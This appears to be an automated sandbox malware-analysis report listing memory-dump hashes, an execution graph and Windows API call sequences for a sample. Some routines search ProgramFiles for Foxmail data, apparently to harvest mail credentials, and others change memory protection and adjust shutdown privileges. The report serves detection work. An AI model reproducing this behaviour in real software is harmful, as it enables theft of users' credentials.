                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                        • API String ID: 0-2353078639
                                                                        • Opcode ID: a35b7a0cd5bb12b7a06bba56945b31112d1cbad8815e698599a6a2d53bfcf8ca
                                                                        • Instruction ID: 49c8903af9200a0c5ee014310189771a4e9291edc96c278db3816899b9fda8a3
                                                                        • Opcode Fuzzy Hash: a35b7a0cd5bb12b7a06bba56945b31112d1cbad8815e698599a6a2d53bfcf8ca
                                                                        • Instruction Fuzzy Hash: 803155BAB043078FCF284AB99A5027AB7E5AFC6290B244C7BC855C7145DE35C807C751
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$tP]q$$]q$$]q$$]q
                                                                        • API String ID: 0-2702571027
                                                                        • Opcode ID: 0fefa1eda1fb706466b60b88ad8e76d0974eb960943ae9f3eab6efb82f959ff6
                                                                        • Instruction ID: af1bbe9c342538f28148a83ddcbb6698dd14187526f514a79ae1b16c1cf7dbcb
                                                                        • Opcode Fuzzy Hash: 0fefa1eda1fb706466b60b88ad8e76d0974eb960943ae9f3eab6efb82f959ff6
                                                                        • Instruction Fuzzy Hash: A631E2B0A04206EBDF2C8E14C580BB5B7F6EB897A0F18C966E8159F290CB71D850CBD1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$d%cq$d%cq$d%cq$tP]q
                                                                        • API String ID: 0-1723543176
                                                                        • Opcode ID: 43a71d740451391b5a139851243f0d59e1f7f21c4ee450a85122e25c3c9ebf2b
                                                                        • Instruction ID: deadafae04622e72adb17cf058b0b1d560880d4ed3de5b756c4a2246e58f930e
                                                                        • Opcode Fuzzy Hash: 43a71d740451391b5a139851243f0d59e1f7f21c4ee450a85122e25c3c9ebf2b
                                                                        • Instruction Fuzzy Hash: 0931B6B0B00215DFCB24DF58C684E5ABBE2FF887A1F158955E905AB750C772DC42CBA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (o]q$(o]q$(o]q$(o]q
                                                                        • API String ID: 0-1261621458
                                                                        • Opcode ID: 1af8c0c4982b6c99e52da73b44c04f6333870c8c394707241f354d94f38fc465
                                                                        • Instruction ID: e4a9dd1721b98b9f2f6c9378a618d57aa75b677c3ad06072eb32cc21b08cd194
                                                                        • Opcode Fuzzy Hash: 1af8c0c4982b6c99e52da73b44c04f6333870c8c394707241f354d94f38fc465
                                                                        • Instruction Fuzzy Hash: 02F137B1704346DFDF248F68C854BAA7BA1EF86350F1488FAE445CB2A1CBB5D845C761
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $]q$$]q$$]q$$]q
                                                                        • API String ID: 0-858218434
                                                                        • Opcode ID: ead4e4587698eeef647db7adea9bcc5fb6d651fb983757fb91c438bcc680d76c
                                                                        • Instruction ID: 85de6752a191e7eef3fe11f3d6c8cb456b048485cd1a24ae6af61e0dae58db8c
                                                                        • Opcode Fuzzy Hash: ead4e4587698eeef647db7adea9bcc5fb6d651fb983757fb91c438bcc680d76c
                                                                        • Instruction Fuzzy Hash: 082135F13103069BDF38556E9840B77B7DB9BC1691F248C2AA905CB3A1DE32C805C361
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q$$]q
                                                                        • API String ID: 0-978391646
                                                                        • Opcode ID: 12d915faa434026034993071d0e64ad5c84c1cd1612989960ad0f2b6a8a86bd3
                                                                        • Instruction ID: fe2ccba1e8552a36bc7598464acec94788ac078ca853872ba540c5c2e922b96b
                                                                        • Opcode Fuzzy Hash: 12d915faa434026034993071d0e64ad5c84c1cd1612989960ad0f2b6a8a86bd3
                                                                        • Instruction Fuzzy Hash: 3D0126723083864FCB3A066C15200A57FB69FC3A9071A489BC480CF742CD154C46C3A7

                                                                        Execution Graph

                                                                        Execution Coverage:2.3%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0.6%
                                                                        Total number of Nodes:174
                                                                        Total number of Limit Nodes:5
                                                                        execution_graph 6749 221c1c5b 6750 221c1c6b ___scrt_fastfail 6749->6750 6753 221c12ee 6750->6753 6752 221c1c87 6754 221c1324 ___scrt_fastfail 6753->6754 6755 221c13b7 GetEnvironmentVariableW 6754->6755 6779 221c10f1 6755->6779 6758 221c10f1 47 API calls 6759 221c1465 6758->6759 6760 221c10f1 47 API calls 6759->6760 6761 221c1479 6760->6761 6762 221c10f1 47 API calls 6761->6762 6763 221c148d 6762->6763 6764 221c10f1 47 API calls 6763->6764 6765 221c14a1 6764->6765 6766 221c10f1 47 API calls 6765->6766 6767 221c14b5 lstrlenW 6766->6767 6768 221c14d9 lstrlenW 6767->6768 6778 221c14d2 6767->6778 6769 221c10f1 47 API calls 6768->6769 6770 221c1501 lstrlenW lstrcatW 6769->6770 6771 221c10f1 47 API calls 6770->6771 6772 221c1539 lstrlenW lstrcatW 6771->6772 6773 221c10f1 47 API calls 6772->6773 6774 221c156b lstrlenW lstrcatW 6773->6774 6775 221c10f1 47 API calls 6774->6775 6776 221c159d lstrlenW lstrcatW 6775->6776 6777 221c10f1 47 API calls 6776->6777 6777->6778 6778->6752 6780 221c1118 ___scrt_fastfail 6779->6780 6781 221c1129 lstrlenW 6780->6781 6792 221c2c40 6781->6792 6784 221c1168 lstrlenW 6785 221c1177 lstrlenW FindFirstFileW 6784->6785 6786 221c11a0 6785->6786 6787 221c11e1 6785->6787 6788 221c11c7 FindNextFileW 6786->6788 6791 221c11aa 6786->6791 6787->6758 6788->6786 6790 221c11da FindClose 6788->6790 6790->6787 6791->6788 6794 221c1000 6791->6794 6793 221c1148 lstrcatW lstrlenW 6792->6793 6793->6784 6793->6785 6795 221c1022 ___scrt_fastfail 6794->6795 6796 221c10af 6795->6796 6797 221c102f lstrcatW lstrlenW 6795->6797 6798 221c10b5 lstrlenW 6796->6798 6808 221c10ad 6796->6808 6799 221c105a lstrlenW 6797->6799 6800 221c106b lstrlenW 6797->6800 6825 221c1e16 6798->6825 6799->6800 6809 221c1e89 lstrlenW 6800->6809 6803 221c10ca 6806 221c1e89 5 API calls 6803->6806 6803->6808 6804 221c1088 GetFileAttributesW 6805 221c109c 6804->6805 6804->6808 6805->6808 6815 221c173a 6805->6815 6806->6808 6808->6791 6810 221c2c40 ___scrt_fastfail 6809->6810 6811 221c1ea7 lstrcatW lstrlenW 6810->6811 6812 221c1ed1 lstrcatW 6811->6812 6813 221c1ec2 6811->6813 6812->6804 6813->6812 6814 221c1ec7 lstrlenW 6813->6814 6814->6812 6816 221c1747 ___scrt_fastfail 6815->6816 6818 221c199f 6816->6818 6830 221c1ede 6816->6830 6818->6808 6819 221c1854 _strlen _strlen 6824 221c1824 ___scrt_fastfail 6819->6824 6820 221c1887 _strlen 6820->6824 6821 221c18aa _strlen 6821->6824 6822 221c18c4 _strlen 6822->6824 6823 221c16aa _strlen 6823->6824 6824->6818 6824->6819 6824->6820 6824->6821 6824->6822 6824->6823 6826 221c1e29 6825->6826 6829 221c1e4c 6825->6829 6827 221c1e2d lstrlenW 6826->6827 6826->6829 6828 221c1e3f lstrlenW 6827->6828 6827->6829 6828->6829 6829->6803 6832 221c222f 6830->6832 6833 221c224e 6832->6833 6836 221c2250 6832->6836 6840 221c474f 6832->6840 6845 221c47e5 6832->6845 6833->6824 6835 221c2909 6837 221c2917 __CxxThrowException 6835->6837 6836->6835 6838 221c28fa __CxxThrowException 6836->6838 6839 221c292d 6837->6839 6838->6835 6839->6824 6852 221c4793 6840->6852 6843 221c478f 6843->6832 6844 221c4765 6858 221c2ada 6844->6858 6851 221c56d0 __dosmaperr 6845->6851 6846 221c570e 6871 221c6368 6846->6871 6848 221c56f9 RtlAllocateHeap 6849 221c570c 6848->6849 6848->6851 6849->6832 6850 221c474f __dosmaperr 7 API calls 6850->6851 6851->6846 6851->6848 6851->6850 6853 221c479f ___DestructExceptionObject 6852->6853 6865 221c5671 RtlEnterCriticalSection 6853->6865 6855 221c47aa 6866 221c47dc 6855->6866 6857 221c47d1 __dosmaperr 6857->6844 6859 221c2ae5 IsProcessorFeaturePresent 6858->6859 6860 221c2ae3 6858->6860 6862 221c2b58 6859->6862 6860->6843 6870 221c2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6862->6870 6864 221c2c3b 6864->6843 6865->6855 6869 221c56b9 RtlLeaveCriticalSection 6866->6869 6868 221c47e3 6868->6857 6869->6868 6870->6864 6874 221c5b7a GetLastError 6871->6874 6875 221c5b99 6874->6875 6876 221c5b93 6874->6876 6880 221c5bf0 SetLastError 6875->6880 6898 221c637b 6875->6898 6891 221c5e08 6876->6891 6881 221c5bf9 6880->6881 6881->6849 6885 221c5bb3 6905 221c571e 6885->6905 6886 221c5bcf 6889 221c571e _free 14 API calls 6886->6889 6887 221c5bb9 6888 221c5be7 SetLastError 6887->6888 6888->6881 6890 221c5be0 6889->6890 6890->6880 6890->6888 6918 221c5c45 6891->6918 6894 221c5e47 TlsGetValue 6895 221c5e3b 6894->6895 6896 221c2ada _ValidateLocalCookies 5 API calls 6895->6896 6897 221c5e58 6896->6897 6897->6875 6903 221c6388 __dosmaperr 6898->6903 6899 221c63c8 6902 221c6368 __dosmaperr 16 API calls 6899->6902 6900 221c63b3 RtlAllocateHeap 6901 221c5bab 6900->6901 6900->6903 6901->6885 6911 221c5e5e 6901->6911 6902->6901 6903->6899 6903->6900 6904 221c474f __dosmaperr 7 API calls 6903->6904 6904->6903 6906 221c5729 HeapFree 6905->6906 6910 221c5752 __dosmaperr 6905->6910 6907 221c573e 6906->6907 6906->6910 6908 221c6368 __dosmaperr 15 API calls 6907->6908 6909 221c5744 GetLastError 6908->6909 6909->6910 6910->6887 6912 221c5c45 __dosmaperr 2 API calls 6911->6912 6913 221c5e85 6912->6913 6914 221c5ea0 TlsSetValue 6913->6914 6915 221c5e94 6913->6915 6914->6915 6916 221c2ada _ValidateLocalCookies 5 API calls 6915->6916 6917 221c5bc8 6916->6917 6917->6885 6917->6886 6919 221c5c75 6918->6919 6922 221c5c71 6918->6922 6919->6894 6919->6895 6920 221c5ca1 GetProcAddress 6920->6919 6921 221c5cb1 __crt_fast_encode_pointer 6920->6921 6921->6919 6922->6919 6922->6920 6923 221cc7a7 6924 221cc7be 6923->6924 6928 221cc82c 6923->6928 6924->6928 6935 221cc7e6 GetModuleHandleA 6924->6935 6925 221cc835 GetModuleHandleA 6929 221cc83f 6925->6929 6926 221cc872 6928->6925 6928->6926 6928->6929 6929->6928 6930 221cc85f GetProcAddress 6929->6930 6930->6928 6931 221cc7dd 6931->6928 6931->6929 6932 221cc800 GetProcAddress 6931->6932 6932->6928 6933 221cc80d VirtualProtect 6932->6933 6933->6928 6934 221cc81c VirtualProtect 6933->6934 6934->6928 6936 221cc7ef 6935->6936 6942 221cc82c 6935->6942 6947 221cc803 GetProcAddress 6936->6947 6938 221cc835 GetModuleHandleA 6945 221cc83f 6938->6945 6939 221cc872 6940 221cc7f4 6941 221cc800 GetProcAddress 6940->6941 6940->6942 6941->6942 6943 221cc80d VirtualProtect 6941->6943 6942->6938 6942->6939 6942->6945 6943->6942 6944 221cc81c VirtualProtect 6943->6944 6944->6942 6945->6942 6946 221cc85f GetProcAddress 6945->6946 6946->6942 6948 221cc82c 6947->6948 6949 221cc80d VirtualProtect 6947->6949 6951 221cc835 GetModuleHandleA 6948->6951 6952 221cc872 6948->6952 6949->6948 6950 221cc81c VirtualProtect 6949->6950 6950->6948 6954 221cc83f 6951->6954 6953 221cc85f GetProcAddress 6953->6954 6954->6948 6954->6953

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 221C1137
                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 221C1151
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 221C115C
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 221C116D
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 221C117C
                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 221C1193
                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 221C11D0
                                                                        • FindClose.KERNEL32(00000000), ref: 221C11DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                        • String ID:
                                                                        • API String ID: 1083526818-0
                                                                        • Opcode ID: 832e3b4244e9afcee496030f2ca6742679e1bedd71ba317e22ad77739e0de00e
                                                                        • Instruction ID: 7c26eea8042c8aef32374302dc638079516442e482923dcd963510d17e7b8b73
                                                                        • Opcode Fuzzy Hash: 832e3b4244e9afcee496030f2ca6742679e1bedd71ba317e22ad77739e0de00e
                                                                        • Instruction Fuzzy Hash: 7C218F766843086BD724EA649C48F9B7BDCEF94724F000D2ABA58D3190EB74D6148796

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 221C1434
                                                                          • Part of subcall function 221C10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 221C1137
                                                                          • Part of subcall function 221C10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 221C1151
                                                                          • Part of subcall function 221C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 221C115C
                                                                          • Part of subcall function 221C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 221C116D
                                                                          • Part of subcall function 221C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 221C117C
                                                                          • Part of subcall function 221C10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 221C1193
                                                                          • Part of subcall function 221C10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 221C11D0
                                                                          • Part of subcall function 221C10F1: FindClose.KERNEL32(00000000), ref: 221C11DB
                                                                        • lstrlenW.KERNEL32(?), ref: 221C14C5
                                                                        • lstrlenW.KERNEL32(?), ref: 221C14E0
                                                                        • lstrlenW.KERNEL32(?,?), ref: 221C150F
                                                                        • lstrcatW.KERNEL32(00000000), ref: 221C1521
                                                                        • lstrlenW.KERNEL32(?,?), ref: 221C1547
                                                                        • lstrcatW.KERNEL32(00000000), ref: 221C1553
                                                                        • lstrlenW.KERNEL32(?,?), ref: 221C1579
                                                                        • lstrcatW.KERNEL32(00000000), ref: 221C1585
                                                                        • lstrlenW.KERNEL32(?,?), ref: 221C15AB
                                                                        • lstrcatW.KERNEL32(00000000), ref: 221C15B7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                        • String ID: )$Foxmail$ProgramFiles
                                                                        • API String ID: 672098462-2938083778
                                                                        • Opcode ID: 6f91ea345e67e05c068665167dd8ee4e45de2e5c5d69d162b2a6090cd0bcfba1
                                                                        • Instruction ID: 1640a9cb99fcc9bc6ddf390c80405b288199091bd2e82d51a544a93c30689e1d
                                                                        • Opcode Fuzzy Hash: 6f91ea345e67e05c068665167dd8ee4e45de2e5c5d69d162b2a6090cd0bcfba1
                                                                        • Instruction Fuzzy Hash: AF81B276A8035CAAEB20DBA4DC85FEF7379EF94710F000596F508E7190EA725B84CB95

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(221CC7DD), ref: 221CC7E6
                                                                        • GetModuleHandleA.KERNEL32(?,221CC7DD), ref: 221CC838
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 221CC860
                                                                          • Part of subcall function 221CC803: GetProcAddress.KERNEL32(00000000,221CC7F4), ref: 221CC804
                                                                          • Part of subcall function 221CC803: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,221CC7F4,221CC7DD), ref: 221CC816
                                                                          • Part of subcall function 221CC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,221CC7F4,221CC7DD), ref: 221CC82A
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProcProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 2099061454-0
                                                                        • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                        • Instruction ID: 9f2d570dc262b475526150eb896222dd1d242ccf635969f311aef9e7a3af3701
                                                                        • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                        • Instruction Fuzzy Hash: 2A01DE089CD3817CAA1196740D01EEBAFD89B37664B101BBAE250C61B3D9A08F06C3A7

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 79 221cc7a7-221cc7bc 80 221cc82d 79->80 81 221cc7be-221cc7c6 79->81 82 221cc82f-221cc833 80->82 81->80 83 221cc7c8-221cc7f6 call 221cc7e6 81->83 84 221cc835-221cc83d GetModuleHandleA 82->84 85 221cc872 call 221cc877 82->85 91 221cc86c-221cc86e 83->91 92 221cc7f8 83->92 88 221cc83f-221cc847 84->88 88->88 90 221cc849-221cc84c 88->90 90->82 93 221cc84e-221cc850 90->93 96 221cc866-221cc86b 91->96 97 221cc870 91->97 94 221cc7fa-221cc7fe 92->94 95 221cc85b-221cc85e 92->95 98 221cc856-221cc85a 93->98 99 221cc852-221cc854 93->99 102 221cc865 94->102 103 221cc800-221cc80b GetProcAddress 94->103 100 221cc85f-221cc860 GetProcAddress 95->100 96->91 97->90 98->95 99->100 100->102 102->96 103->80 104 221cc80d-221cc81a VirtualProtect 103->104 105 221cc82c 104->105 106 221cc81c-221cc82a VirtualProtect 104->106 105->80 106->105
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,221CC7DD), ref: 221CC838
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 221CC860
                                                                          • Part of subcall function 221CC7E6: GetModuleHandleA.KERNEL32(221CC7DD), ref: 221CC7E6
                                                                          • Part of subcall function 221CC7E6: GetProcAddress.KERNEL32(00000000,221CC7F4), ref: 221CC804
                                                                          • Part of subcall function 221CC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,221CC7F4,221CC7DD), ref: 221CC816
                                                                          • Part of subcall function 221CC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,221CC7F4,221CC7DD), ref: 221CC82A
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProcProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 2099061454-0
                                                                        • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                        • Instruction ID: bf43c204a4415a76dcab0c57454d3189cf292607f4eef0dd084516b4712a8886
                                                                        • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                        • Instruction Fuzzy Hash: 8D21E26A48C3816EEB118B744D04FE76FD99B37264F1906BAD140CB1A3D5A88F46C3A7

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 107 221cc803-221cc80b GetProcAddress 108 221cc82d 107->108 109 221cc80d-221cc81a VirtualProtect 107->109 112 221cc82f-221cc833 108->112 110 221cc82c 109->110 111 221cc81c-221cc82a VirtualProtect 109->111 110->108 111->110 113 221cc835-221cc83d GetModuleHandleA 112->113 114 221cc872 call 221cc877 112->114 116 221cc83f-221cc847 113->116 116->116 117 221cc849-221cc84c 116->117 117->112 118 221cc84e-221cc850 117->118 119 221cc856-221cc85e 118->119 120 221cc852-221cc854 118->120 121 221cc85f-221cc865 GetProcAddress 119->121 120->121 124 221cc866-221cc86e 121->124 126 221cc870 124->126 126->117
                                                                        APIs
                                                                        • GetProcAddress.KERNEL32(00000000,221CC7F4), ref: 221CC804
                                                                        • VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,221CC7F4,221CC7DD), ref: 221CC816
                                                                        • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,221CC7F4,221CC7DD), ref: 221CC82A
                                                                        • GetModuleHandleA.KERNEL32(?,221CC7DD), ref: 221CC838
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 221CC860
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProcProtectVirtual$HandleModule
                                                                        • String ID:
                                                                        • API String ID: 2152742572-0
                                                                        • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                        • Instruction ID: 34e4e6bdecff660f76486cb39b603687e5b6aa88070bb31c41e404c0bf010d31
                                                                        • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                        • Instruction Fuzzy Hash: 60F0A949ACD3807CFA1146B41C41EFB9FCC8B37660B101A76A210C71A3D8A58F0683F7

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 136 40348f-4034cc SetErrorMode GetVersion 137 4034ce-4034d6 call 4067d0 136->137 138 4034df 136->138 137->138 143 4034d8 137->143 139 4034e4-4034f8 call 406760 lstrlenA 138->139 145 4034fa-403516 call 4067d0 * 3 139->145 143->138 152 403527-403586 #17 OleInitialize SHGetFileInfoW call 4063db GetCommandLineW call 4063db 145->152 153 403518-40351e 145->153 160 403590-4035aa call 405cdd CharNextW 152->160 161 403588-40358f 152->161 153->152 157 403520 153->157 157->152 164 4035b0-4035b6 160->164 165 4036c1-4036db GetTempPathW call 40345e 160->165 161->160 167 4035b8-4035bd 164->167 168 4035bf-4035c3 164->168 174 403733-40374d DeleteFileW call 403015 165->174 175 4036dd-4036fb GetWindowsDirectoryW lstrcatW call 40345e 165->175 167->167 167->168 170 4035c5-4035c9 168->170 171 4035ca-4035ce 168->171 170->171 172 4035d4-4035da 171->172 173 40368d-40369a call 405cdd 171->173 176 4035f5-40362e 172->176 177 4035dc-4035e4 172->177 193 40369c-40369d 173->193 194 40369e-4036a4 173->194 188 403753-403759 174->188 189 4037fe-40380e call 4039d0 OleUninitialize 174->189 175->174 192 4036fd-40372d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40345e 175->192 183 403630-403635 176->183 184 40364b-403685 176->184 181 4035e6-4035e9 177->181 182 4035eb 177->182 181->176 181->182 182->176 183->184 190 403637-40363f 183->190 184->173 191 403687-40368b 184->191 196 4037ee-4037fa call 403aaa 188->196 197 40375f-40376a call 405cdd 188->197 211 403934-40393a 189->211 212 403814-403824 call 405a41 ExitProcess 189->212 199 403641-403644 190->199 200 403646 190->200 191->173 201 4036ac-4036ba call 4063db 191->201 192->174 192->189 193->194 194->164 195 4036aa 194->195 203 4036bf 195->203 196->189 213 4037b8-4037c2 197->213 214 40376c-4037a1 197->214 199->184 199->200 200->184 201->203 203->165 216 4039b8-4039c0 211->216 217 40393c-403952 GetCurrentProcess OpenProcessToken 211->217 221 4037c4-4037d2 call 405db8 213->221 222 40382a-40383e call 4059ac lstrcatW 213->222 218 4037a3-4037a7 214->218 219 4039c2 216->219 220 4039c6-4039ca ExitProcess 216->220 224 403954-403982 LookupPrivilegeValueW AdjustTokenPrivileges 217->224 225 403988-403996 call 4067d0 217->225 227 4037b0-4037b4 218->227 228 4037a9-4037ae 218->228 219->220 221->189 237 4037d4-4037ea call 4063db * 2 221->237 238 403840-403846 lstrcatW 222->238 239 40384b-403865 lstrcatW lstrcmpiW 222->239 224->225 235 4039a4-4039af ExitWindowsEx 225->235 236 403998-4039a2 225->236 227->218 232 4037b6 227->232 228->227 228->232 232->213 235->216 241 4039b1-4039b3 call 40140b 235->241 236->235 236->241 237->196 238->239 239->189 240 403867-40386a 239->240 243 403873 call 40598f 240->243 244 40386c-403871 call 405912 240->244 241->216 253 403878-403886 SetCurrentDirectoryW 243->253 244->253 254 403893-4038bc call 4063db 253->254 255 403888-40388e call 4063db 253->255 259 4038c1-4038dd call 406418 DeleteFileW 254->259 255->254 262 40391e-403926 259->262 263 4038df-4038ef CopyFileW 259->263 262->259 265 403928-40392f call 4061a1 262->265 263->262 264 4038f1-403911 call 4061a1 call 406418 call 4059c4 263->264 264->262 274 403913-40391a CloseHandle 264->274 265->189 274->262
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32 ref: 004034B2
                                                                        • GetVersion.KERNEL32 ref: 004034B8
                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034EB
                                                                        • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403528
                                                                        • OleInitialize.OLE32(00000000), ref: 0040352F
                                                                        • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 0040354B
                                                                        • GetCommandLineW.KERNEL32(00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 00403560
                                                                        • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000007,00000009,0000000B), ref: 00403598
                                                                          • Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                          • Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                        • GetTempPathW.KERNEL32(00000400,00437800,?,00000007,00000009,0000000B), ref: 004036D2
                                                                        • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000007,00000009,0000000B), ref: 004036E3
